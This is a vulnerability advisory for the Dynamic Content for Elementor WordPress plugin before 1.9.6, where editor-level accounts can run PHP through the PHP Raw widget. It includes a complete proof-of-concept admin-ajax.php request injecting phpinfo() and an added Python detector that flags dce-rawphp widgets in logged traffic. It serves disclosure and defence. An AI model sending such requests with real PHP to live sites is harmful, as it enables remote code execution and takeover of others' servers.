wpexploit Wpvulndb WPEX-ID:05B0E3EB-82EA-4868-A037-D7EE3EACE8AA
Oct 08, 2020 - 12:00 a.m.

Dynamic Content for Elementor < 1.9.6 - Authenticated RCE

2020-10-08 00:00:00
wpvulndb
8

The PHP Raw Widget (https://www.dynamic.ooo/widget/php-raw/) of the Dynamic Content for Elementor plugin before 1.9.6 did not properly check for user permissions, allowing accounts with a role as low as editor to perform RCE attacks.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/post.php?post=1&action=elementor
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1657
Origin: https://example.com
DNT: 1
Connection: close
Cookie: [Editor account cookies]

actions=%7B%22save_builder%22%3A%7B%22action%22%3A%22save_builder%22%2C%22data%22%3A%7B%22status%22%3A%22publish%22%2C%22elements%22%3A%5B%7B%22id%22%3A%227d8463f3%22%2C%22elType%22%3A%22section%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%2267a91131%22%2C%22elType%22%3A%22column%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22_column_size%22%3A100%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%22434ded6e%22%2C%22elType%22%3A%22widget%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22editor%22%3A%22%3Cp%3E%3C!--+wp%3Aparagraph+--%3E%3C%2Fp%3E%5Cn%3Cp%3EWelcome+to+WordPress.+This+is+your+first+post.+Edit+or+delete+it%2C+then+start+writing!%3C%2Fp%3E%5Cn%3Cp%3E%3C!--+%2Fwp%3Aparagraph+--%3E%3C%2Fp%3E%22%7D%2C%22elements%22%3A%5B%5D%2C%22widgetType%22%3A%22text-editor%22%7D%5D%7D%5D%7D%2C%7B%22id%22%3A%22c011af3%22%2C%22elType%22%3A%22section%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%22d8404b7%22%2C%22elType%22%3A%22column%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22_column_size%22%3A100%2C%22_inline_size%22%3Anull%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%228b4910d%22%2C%22elType%22%3A%22widget%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22custom_php%22%3A%22phpinfo()%3B%22%7D%2C%22elements%22%3A%5B%5D%2C%22widgetType%22%3A%22dce-rawphp%22%7D%5D%7D%5D%7D%5D%2C%22settings%22%3A%7B%22post_title%22%3A%22Hello+world!%22%2C%22scroll_viewport%22%3A%22%23outer-wrap%22%2C%22scroll_contentScroll%22%3A%22%23wrap%22%2C%22post_status%22%3A%22publish%22%7D%7D%7D%7D&_nonce=496eff7787&editor_post_id=1&initial_document_id=1&action=elementor_ajax
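
For defenders reviewing captured admin-ajax.php POST bodies (WAF or proxy logs), the following added example, which is not part of the original advisory or the plugin's code, decodes the actions parameter of an elementor_ajax request and reports any dce-rawphp widget carrying a custom_php setting. The function names and the sample body are assumptions constructed for illustration; the field names are those visible in the request above.

```python
import json
from urllib.parse import parse_qs, urlencode

RAW_PHP_WIDGET = "dce-rawphp"  # widgetType of the PHP Raw widget in the request above


def find_raw_php_widgets(elements, path=()):
    """Walk an Elementor element tree; yield (path, id, custom_php) per hit."""
    if not isinstance(elements, list):
        return
    for index, element in enumerate(elements):
        if not isinstance(element, dict):
            continue
        here = path + (index,)
        if element.get("widgetType") == RAW_PHP_WIDGET:
            settings = element.get("settings")
            code = settings.get("custom_php", "") if isinstance(settings, dict) else ""
            yield here, element.get("id"), code
        yield from find_raw_php_widgets(element.get("elements"), here)


def inspect_elementor_ajax_body(body):
    """Return PHP Raw widget findings for one urlencoded admin-ajax.php body."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("action", [""])[0] != "elementor_ajax":
        return []
    findings = []
    for raw in form.get("actions", []):
        try:
            actions = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed JSON: nothing to walk
        for name, entry in (actions.items() if isinstance(actions, dict) else []):
            data = entry.get("data") if isinstance(entry, dict) else None
            elements = data.get("elements") if isinstance(data, dict) else None
            for path, widget_id, code in find_raw_php_widgets(elements):
                findings.append({"action": name, "path": path,
                                 "widget_id": widget_id, "custom_php": code})
    return findings


# Constructed sample body (not captured traffic); the PHP value is a placeholder.
_widget = {"id": "c3", "elType": "widget", "widgetType": "dce-rawphp",
           "settings": {"custom_php": "/* placeholder */"}, "elements": []}
_tree = [{"id": "a1", "elType": "section", "elements": [
    {"id": "b2", "elType": "column", "elements": [_widget]}]}]
SAMPLE_BODY = urlencode({
    "actions": json.dumps({"save_builder": {"data": {"elements": _tree}}}),
    "editor_post_id": "1", "action": "elementor_ajax"})
```

A finding only shows that a save request contained the widget; whether it matters depends on the role of the account that sent it and on whether the installed plugin version is before 1.9.6.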